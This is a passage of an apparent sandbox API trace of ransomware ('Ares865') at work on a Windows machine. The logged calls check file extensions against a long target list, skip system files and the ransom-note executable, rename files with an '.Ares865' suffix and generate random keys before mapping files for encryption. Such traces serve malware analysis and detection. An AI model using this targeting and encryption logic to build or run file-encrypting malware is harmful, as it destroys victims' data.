lstrcmpiW (lpString1="png", lpString2="fpt") returned 1 [0115.288] lstrlenW (lpString="frm") returned 3 [0115.288] lstrcmpiW (lpString1="png", lpString2="frm") returned 1 [0115.288] lstrlenW (lpString="gdb") returned 3 [0115.288] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0115.288] lstrlenW (lpString="gdb") returned 3 [0115.288] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0115.288] lstrlenW (lpString="grdb") returned 4 [0115.288] lstrcmpiW (lpString1=".png", lpString2="grdb") returned -1 [0115.288] lstrlenW (lpString="gwi") returned 3 [0115.288] lstrcmpiW (lpString1="png", lpString2="gwi") returned 1 [0115.288] lstrlenW (lpString="hdb") returned 3 [0115.288] lstrcmpiW (lpString1="png", lpString2="hdb") returned 1 [0115.288] lstrlenW (lpString="his") returned 3 [0115.288] lstrcmpiW (lpString1="png", lpString2="his") returned 1 [0115.288] lstrlenW (lpString="ib") returned 2 [0115.288] lstrcmpiW (lpString1="ng", lpString2="ib") returned 1 [0115.288] lstrlenW (lpString="idb") returned 3 [0115.288] lstrcmpiW (lpString1="png", lpString2="idb") returned 1 [0115.288] lstrlenW (lpString="ihx") returned 3 [0115.288] lstrcmpiW (lpString1="png", lpString2="ihx") returned 1 [0115.288] lstrlenW (lpString="itdb") returned 4 [0115.288] lstrcmpiW (lpString1=".png", lpString2="itdb") returned -1 [0115.288] lstrlenW (lpString="itw") returned 3 [0115.288] lstrcmpiW (lpString1="png", lpString2="itw") returned 1 [0115.288] lstrlenW (lpString="jet") returned 3 [0115.288] lstrcmpiW (lpString1="png", lpString2="jet") returned 1 [0115.288] lstrlenW (lpString="jtx") returned 3 [0115.288] lstrcmpiW (lpString1="png", lpString2="jtx") returned 1 [0115.288] lstrlenW (lpString="kdb") returned 3 [0115.288] lstrcmpiW (lpString1="png", lpString2="kdb") returned 1 [0115.288] lstrlenW (lpString="kexi") returned 4 [0115.289] lstrcmpiW (lpString1=".png", lpString2="kexi") returned -1 [0115.289] lstrlenW (lpString="kexic") returned 5 [0115.289] lstrcmpiW (lpString1="n.png", lpString2="kexic") returned 1 [0115.289] lstrlenW (lpString="kexis") returned 5 [0115.289] lstrcmpiW (lpString1="n.png", lpString2="kexis") returned 1 [0115.289] lstrlenW (lpString="lgc") returned 3 [0115.289] lstrcmpiW (lpString1="png", lpString2="lgc") returned 1 [0115.289] lstrlenW (lpString="lwx") returned 3 [0115.289] lstrcmpiW (lpString1="png", lpString2="lwx") returned 1 [0115.289] lstrlenW (lpString="maf") returned 3 [0115.289] lstrcmpiW (lpString1="png", lpString2="maf") returned 1 [0115.289] lstrlenW (lpString="maq") returned 3 [0115.289] lstrcmpiW (lpString1="png", lpString2="maq") returned 1 [0115.289] lstrlenW (lpString="mar") returned 3 [0115.289] lstrcmpiW (lpString1="png", lpString2="mar") returned 1 [0115.289] lstrlenW (lpString="marshal") returned 7 [0115.289] lstrcmpiW (lpString1="con.png", lpString2="marshal") returned -1 [0115.289] lstrlenW (lpString="mas") returned 3 [0115.289] lstrcmpiW (lpString1="png", lpString2="mas") returned 1 [0115.289] lstrlenW (lpString="mav") returned 3 [0115.289] lstrcmpiW (lpString1="png", lpString2="mav") returned 1 [0115.289] lstrlenW (lpString="maw") returned 3 [0115.289] lstrcmpiW (lpString1="png", lpString2="maw") returned 1 [0115.289] lstrlenW (lpString="mdbhtml") returned 7 [0115.289] lstrcmpiW (lpString1="con.png", lpString2="mdbhtml") returned -1 [0115.289] lstrlenW (lpString="mdn") returned 3 [0115.289] lstrcmpiW (lpString1="png", lpString2="mdn") returned 1 [0115.289] lstrlenW (lpString="mdt") returned 3 [0115.289] lstrcmpiW (lpString1="png", lpString2="mdt") returned 1 [0115.289] lstrlenW (lpString="mfd") returned 3 [0115.289] lstrcmpiW (lpString1="png", lpString2="mfd") returned 1 [0115.289] lstrlenW (lpString="mpd") returned 3 [0115.289] lstrcmpiW (lpString1="png", lpString2="mpd") returned 1 [0115.289] lstrlenW (lpString="mrg") returned 3 [0115.289] lstrcmpiW (lpString1="png", lpString2="mrg") returned 1 [0115.290] lstrlenW (lpString="mud") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="mud") returned 1 [0115.290] lstrlenW (lpString="mwb") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="mwb") returned 1 [0115.290] lstrlenW (lpString="myd") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="myd") returned 1 [0115.290] lstrlenW (lpString="ndf") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="ndf") returned 1 [0115.290] lstrlenW (lpString="nnt") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="nnt") returned 1 [0115.290] lstrlenW (lpString="nrmlib") returned 6 [0115.290] lstrcmpiW (lpString1="on.png", lpString2="nrmlib") returned 1 [0115.290] lstrlenW (lpString="ns2") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="ns2") returned 1 [0115.290] lstrlenW (lpString="ns3") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="ns3") returned 1 [0115.290] lstrlenW (lpString="ns4") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="ns4") returned 1 [0115.290] lstrlenW (lpString="nsf") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="nsf") returned 1 [0115.290] lstrlenW (lpString="nv") returned 2 [0115.290] lstrcmpiW (lpString1="ng", lpString2="nv") returned -1 [0115.290] lstrlenW (lpString="nv2") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="nv2") returned 1 [0115.290] lstrlenW (lpString="nwdb") returned 4 [0115.290] lstrcmpiW (lpString1=".png", lpString2="nwdb") returned -1 [0115.290] lstrlenW (lpString="nyf") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="nyf") returned 1 [0115.290] lstrlenW (lpString="odb") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0115.290] lstrlenW (lpString="odb") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0115.290] lstrlenW (lpString="oqy") returned 3 [0115.290] lstrcmpiW (lpString1="png", lpString2="oqy") returned 1 [0115.291] lstrlenW (lpString="ora") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="ora") returned 1 [0115.291] lstrlenW (lpString="orx") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="orx") returned 1 [0115.291] lstrlenW (lpString="owc") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="owc") returned 1 [0115.291] lstrlenW (lpString="p96") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="p96") returned 1 [0115.291] lstrlenW (lpString="p97") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="p97") returned 1 [0115.291] lstrlenW (lpString="pan") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="pan") returned 1 [0115.291] lstrlenW (lpString="pdb") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="pdb") returned 1 [0115.291] lstrlenW (lpString="pdm") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="pdm") returned 1 [0115.291] lstrlenW (lpString="pnz") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="pnz") returned -1 [0115.291] lstrlenW (lpString="qry") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="qry") returned -1 [0115.291] lstrlenW (lpString="qvd") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="qvd") returned -1 [0115.291] lstrlenW (lpString="rbf") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="rbf") returned -1 [0115.291] lstrlenW (lpString="rctd") returned 4 [0115.291] lstrcmpiW (lpString1=".png", lpString2="rctd") returned -1 [0115.291] lstrlenW (lpString="rod") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="rod") returned -1 [0115.291] lstrlenW (lpString="rodx") returned 4 [0115.291] lstrcmpiW (lpString1=".png", lpString2="rodx") returned -1 [0115.291] lstrlenW (lpString="rpd") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="rpd") returned -1 [0115.291] lstrlenW (lpString="rsd") returned 3 [0115.291] lstrcmpiW (lpString1="png", lpString2="rsd") returned -1 [0115.291] lstrlenW (lpString="sas7bdat") returned 8 [0115.292] lstrlenW (lpString="sbf") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="sbf") returned -1 [0115.292] lstrlenW (lpString="scx") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="scx") returned -1 [0115.292] lstrlenW (lpString="sdb") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="sdb") returned -1 [0115.292] lstrlenW (lpString="sdc") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="sdc") returned -1 [0115.292] lstrlenW (lpString="sdf") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="sdf") returned -1 [0115.292] lstrlenW (lpString="sis") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="sis") returned -1 [0115.292] lstrlenW (lpString="spq") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="spq") returned -1 [0115.292] lstrlenW (lpString="te") returned 2 [0115.292] lstrcmpiW (lpString1="ng", lpString2="te") returned -1 [0115.292] lstrlenW (lpString="teacher") returned 7 [0115.292] lstrcmpiW (lpString1="con.png", lpString2="teacher") returned -1 [0115.292] lstrlenW (lpString="tmd") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="tmd") returned -1 [0115.292] lstrlenW (lpString="tps") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="tps") returned -1 [0115.292] lstrlenW (lpString="trc") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0115.292] lstrlenW (lpString="trc") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0115.292] lstrlenW (lpString="trm") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="trm") returned -1 [0115.292] lstrlenW (lpString="udb") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="udb") returned -1 [0115.292] lstrlenW (lpString="udl") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="udl") returned -1 [0115.292] lstrlenW (lpString="usr") returned 3 [0115.292] lstrcmpiW (lpString1="png", lpString2="usr") returned -1 [0115.292] lstrlenW (lpString="v12") returned 3 [0115.293] lstrcmpiW (lpString1="png", lpString2="v12") returned -1 [0115.293] lstrlenW (lpString="vis") returned 3 [0115.293] lstrcmpiW (lpString1="png", lpString2="vis") returned -1 [0115.293] lstrlenW (lpString="vpd") returned 3 [0115.293] lstrcmpiW (lpString1="png", lpString2="vpd") returned -1 [0115.293] lstrlenW (lpString="vvv") returned 3 [0115.293] lstrcmpiW (lpString1="png", lpString2="vvv") returned -1 [0115.293] lstrlenW (lpString="wdb") returned 3 [0115.293] lstrcmpiW (lpString1="png", lpString2="wdb") returned -1 [0115.293] lstrlenW (lpString="wmdb") returned 4 [0115.293] lstrcmpiW (lpString1=".png", lpString2="wmdb") returned -1 [0115.293] lstrlenW (lpString="wrk") returned 3 [0115.293] lstrcmpiW (lpString1="png", lpString2="wrk") returned -1 [0115.293] lstrlenW (lpString="xdb") returned 3 [0115.293] lstrcmpiW (lpString1="png", lpString2="xdb") returned -1 [0115.293] lstrlenW (lpString="xld") returned 3 [0115.293] lstrcmpiW (lpString1="png", lpString2="xld") returned -1 [0115.293] lstrlenW (lpString="xmlff") returned 5 [0115.293] lstrcmpiW (lpString1="n.png", lpString2="xmlff") returned -1 [0115.293] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png.Ares865") returned 78 [0115.293] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\icon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\icon.png.ares865"), dwFlags=0x1) returned 1 [0115.295] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\icon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.295] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12960) returned 1 [0115.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.296] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.296] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.296] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.297] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.297] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.297] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x35a0, lpName=0x0) returned 0x170 [0115.300] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x35a0) returned 0x190000 [0115.302] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.303] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.303] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.303] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.304] CloseHandle (hObject=0x170) returned 1 [0115.304] CloseHandle (hObject=0x118) returned 1 [0115.304] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.304] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.304] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.304] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51d17d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51d17d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0115.304] lstrcmpiW (lpString1="images", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0115.304] lstrcmpiW (lpString1="images", lpString2="aoldtz.exe") returned 1 [0115.304] lstrcmpiW (lpString1="images", lpString2=".") returned 1 [0115.304] lstrcmpiW (lpString1="images", lpString2="..") returned 1 [0115.304] lstrcmpiW (lpString1="images", lpString2="windows") returned -1 [0115.304] lstrcmpiW (lpString1="images", lpString2="bootmgr") returned 1 [0115.304] lstrcmpiW (lpString1="images", lpString2="temp") returned -1 [0115.304] lstrcmpiW (lpString1="images", lpString2="pagefile.sys") returned -1 [0115.304] lstrcmpiW (lpString1="images", lpString2="boot") returned 1 [0115.304] lstrcmpiW (lpString1="images", lpString2="ids.txt") returned 1 [0115.304] lstrcmpiW (lpString1="images", lpString2="ntuser.dat") returned -1 [0115.304] lstrcmpiW (lpString1="images", lpString2="perflogs") returned -1 [0115.304] lstrcmpiW (lpString1="images", lpString2="MSBuild") returned -1 [0115.304] lstrlenW (lpString="images") returned 6 [0115.304] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png") returned 70 [0115.304] lstrcpyW (in: lpString1=0x2cce47c, lpString2="images" | out: lpString1="images") returned="images" [0115.304] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0115.304] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8a) returned 0x336fc8 [0115.304] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0115.305] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf13d2d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcf13d2d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbf1ad59c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x172a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2="aoldtz.exe") returned 1 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2=".") returned 1 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2="..") returned 1 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2="windows") returned -1 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2="bootmgr") returned 1 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2="temp") returned -1 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2="pagefile.sys") returned -1 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2="boot") returned 1 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2="ids.txt") returned 1 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2="ntuser.dat") returned -1 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2="perflogs") returned -1 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2="MSBuild") returned -1 [0115.305] lstrlenW (lpString="logo.png") returned 8 [0115.305] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images") returned 68 [0115.305] lstrcpyW (in: lpString1=0x2cce47c, lpString2="logo.png" | out: lpString1="logo.png") returned="logo.png" [0115.305] lstrlenW (lpString="logo.png") returned 8 [0115.305] lstrlenW (lpString="Ares865") returned 7 [0115.305] lstrcmpiW (lpString1="ogo.png", lpString2="Ares865") returned 1 [0115.305] lstrlenW (lpString=".dll") returned 4 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2=".dll") returned 1 [0115.305] lstrlenW (lpString=".lnk") returned 4 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2=".lnk") returned 1 [0115.305] lstrlenW (lpString=".ini") returned 4 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2=".ini") returned 1 [0115.305] lstrlenW (lpString=".sys") returned 4 [0115.305] lstrcmpiW (lpString1="logo.png", lpString2=".sys") returned 1 [0115.305] lstrlenW (lpString="logo.png") returned 8 [0115.305] lstrlenW (lpString="bak") returned 3 [0115.305] lstrcmpiW (lpString1="png", lpString2="bak") returned 1 [0115.305] lstrlenW (lpString="ba_") returned 3 [0115.305] lstrcmpiW (lpString1="png", lpString2="ba_") returned 1 [0115.305] lstrlenW (lpString="dbb") returned 3 [0115.305] lstrcmpiW (lpString1="png", lpString2="dbb") returned 1 [0115.306] lstrlenW (lpString="vmdk") returned 4 [0115.306] lstrcmpiW (lpString1=".png", lpString2="vmdk") returned -1 [0115.306] lstrlenW (lpString="rar") returned 3 [0115.306] lstrcmpiW (lpString1="png", lpString2="rar") returned -1 [0115.306] lstrlenW (lpString="zip") returned 3 [0115.306] lstrcmpiW (lpString1="png", lpString2="zip") returned -1 [0115.306] lstrlenW (lpString="tgz") returned 3 [0115.306] lstrcmpiW (lpString1="png", lpString2="tgz") returned -1 [0115.306] lstrlenW (lpString="vbox") returned 4 [0115.306] lstrcmpiW (lpString1=".png", lpString2="vbox") returned -1 [0115.306] lstrlenW (lpString="vdi") returned 3 [0115.306] lstrcmpiW (lpString1="png", lpString2="vdi") returned -1 [0115.306] lstrlenW (lpString="vhd") returned 3 [0115.306] lstrcmpiW (lpString1="png", lpString2="vhd") returned -1 [0115.306] lstrlenW (lpString="vhdx") returned 4 [0115.306] lstrcmpiW (lpString1=".png", lpString2="vhdx") returned -1 [0115.306] lstrlenW (lpString="avhd") returned 4 [0115.306] lstrcmpiW (lpString1=".png", lpString2="avhd") returned -1 [0115.306] lstrlenW (lpString="db") returned 2 [0115.306] lstrcmpiW (lpString1="ng", lpString2="db") returned 1 [0115.306] lstrlenW (lpString="db2") returned 3 [0115.306] lstrcmpiW (lpString1="png", lpString2="db2") returned 1 [0115.306] lstrlenW (lpString="db3") returned 3 [0115.306] lstrcmpiW (lpString1="png", lpString2="db3") returned 1 [0115.306] lstrlenW (lpString="dbf") returned 3 [0115.306] lstrcmpiW (lpString1="png", lpString2="dbf") returned 1 [0115.306] lstrlenW (lpString="mdf") returned 3 [0115.306] lstrcmpiW (lpString1="png", lpString2="mdf") returned 1 [0115.306] lstrlenW (lpString="mdb") returned 3 [0115.306] lstrcmpiW (lpString1="png", lpString2="mdb") returned 1 [0115.306] lstrlenW (lpString="sql") returned 3 [0115.306] lstrcmpiW (lpString1="png", lpString2="sql") returned -1 [0115.306] lstrlenW (lpString="sqlite") returned 6 [0115.306] lstrcmpiW (lpString1="go.png", lpString2="sqlite") returned -1 [0115.306] lstrlenW (lpString="sqlite3") returned 7 [0115.307] lstrcmpiW (lpString1="ogo.png", lpString2="sqlite3") returned -1 [0115.307] lstrlenW (lpString="sqlitedb") returned 8 [0115.307] lstrlenW (lpString="xml") returned 3 [0115.307] lstrcmpiW (lpString1="png", lpString2="xml") returned -1 [0115.307] lstrlenW (lpString="$er") returned 3 [0115.307] lstrcmpiW (lpString1="png", lpString2="$er") returned 1 [0115.307] lstrlenW (lpString="4dd") returned 3 [0115.307] lstrcmpiW (lpString1="png", lpString2="4dd") returned 1 [0115.307] lstrlenW (lpString="4dl") returned 3 [0115.307] lstrcmpiW (lpString1="png", lpString2="4dl") returned 1 [0115.307] lstrlenW (lpString="^^^") returned 3 [0115.307] lstrcmpiW (lpString1="png", lpString2="^^^") returned 1 [0115.307] lstrlenW (lpString="abs") returned 3 [0115.307] lstrcmpiW (lpString1="png", lpString2="abs") returned 1 [0115.307] lstrlenW (lpString="abx") returned 3 [0115.307] lstrcmpiW (lpString1="png", lpString2="abx") returned 1 [0115.307] lstrlenW (lpString="accdb") returned 5 [0115.307] lstrcmpiW (lpString1="o.png", lpString2="accdb") returned 1 [0115.307] lstrlenW (lpString="accdc") returned 5 [0115.307] lstrcmpiW (lpString1="o.png", lpString2="accdc") returned 1 [0115.307] lstrlenW (lpString="accde") returned 5 [0115.307] lstrcmpiW (lpString1="o.png", lpString2="accde") returned 1 [0115.307] lstrlenW (lpString="accdr") returned 5 [0115.307] lstrcmpiW (lpString1="o.png", lpString2="accdr") returned 1 [0115.307] lstrlenW (lpString="accdt") returned 5 [0115.307] lstrcmpiW (lpString1="o.png", lpString2="accdt") returned 1 [0115.307] lstrlenW (lpString="accdw") returned 5 [0115.307] lstrcmpiW (lpString1="o.png", lpString2="accdw") returned 1 [0115.307] lstrlenW (lpString="accft") returned 5 [0115.307] lstrcmpiW (lpString1="o.png", lpString2="accft") returned 1 [0115.307] lstrlenW (lpString="adb") returned 3 [0115.307] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0115.307] lstrlenW (lpString="adb") returned 3 [0115.307] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0115.307] lstrlenW (lpString="ade") returned 3 [0115.307] lstrcmpiW (lpString1="png", lpString2="ade") returned 1 [0115.307] lstrlenW (lpString="adf") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="adf") returned 1 [0115.308] lstrlenW (lpString="adn") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="adn") returned 1 [0115.308] lstrlenW (lpString="adp") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="adp") returned 1 [0115.308] lstrlenW (lpString="alf") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="alf") returned 1 [0115.308] lstrlenW (lpString="ask") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="ask") returned 1 [0115.308] lstrlenW (lpString="btr") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="btr") returned 1 [0115.308] lstrlenW (lpString="cat") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="cat") returned 1 [0115.308] lstrlenW (lpString="cdb") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="cdb") returned 1 [0115.308] lstrlenW (lpString="ckp") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="ckp") returned 1 [0115.308] lstrlenW (lpString="cma") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="cma") returned 1 [0115.308] lstrlenW (lpString="cpd") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="cpd") returned 1 [0115.308] lstrlenW (lpString="dacpac") returned 6 [0115.308] lstrcmpiW (lpString1="go.png", lpString2="dacpac") returned 1 [0115.308] lstrlenW (lpString="dad") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="dad") returned 1 [0115.308] lstrlenW (lpString="dadiagrams") returned 10 [0115.308] lstrlenW (lpString="daschema") returned 8 [0115.308] lstrlenW (lpString="db-journal") returned 10 [0115.308] lstrlenW (lpString="db-shm") returned 6 [0115.308] lstrcmpiW (lpString1="go.png", lpString2="db-shm") returned 1 [0115.308] lstrlenW (lpString="db-wal") returned 6 [0115.308] lstrcmpiW (lpString1="go.png", lpString2="db-wal") returned 1 [0115.308] lstrlenW (lpString="dbc") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="dbc") returned 1 [0115.308] lstrlenW (lpString="dbs") returned 3 [0115.308] lstrcmpiW (lpString1="png", lpString2="dbs") returned 1 [0115.309] lstrlenW (lpString="dbt") returned 3 [0115.309] lstrcmpiW (lpString1="png", lpString2="dbt") returned 1 [0115.309] lstrlenW (lpString="dbv") returned 3 [0115.309] lstrcmpiW (lpString1="png", lpString2="dbv") returned 1 [0115.309] lstrlenW (lpString="dbx") returned 3 [0115.309] lstrcmpiW (lpString1="png", lpString2="dbx") returned 1 [0115.309] lstrlenW (lpString="dcb") returned 3 [0115.309] lstrcmpiW (lpString1="png", lpString2="dcb") returned 1 [0115.309] lstrcmpiW (lpString1="png", lpString2="dct") returned 1 [0115.310] lstrcmpiW (lpString1="png", lpString2="dcx") returned 1 [0115.310] lstrcmpiW (lpString1="png", lpString2="ddl") returned 1 [0115.310] lstrcmpiW (lpString1=".png", lpString2="dlis") returned -1 [0115.310] lstrcmpiW (lpString1="png", lpString2="dp1") returned 1 [0115.310] lstrcmpiW (lpString1="png", lpString2="dqy") returned 1 [0115.311] lstrcmpiW (lpString1="png", lpString2="dsk") returned 1 [0115.311] lstrcmpiW (lpString1="png", lpString2="dsn") returned 1 [0115.311] lstrcmpiW (lpString1=".png", lpString2="dtsx") returned -1 [0115.311] lstrcmpiW (lpString1="png", lpString2="dxl") returned 1 [0115.312] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png.Ares865") returned 78 [0115.312] MoveFileExW 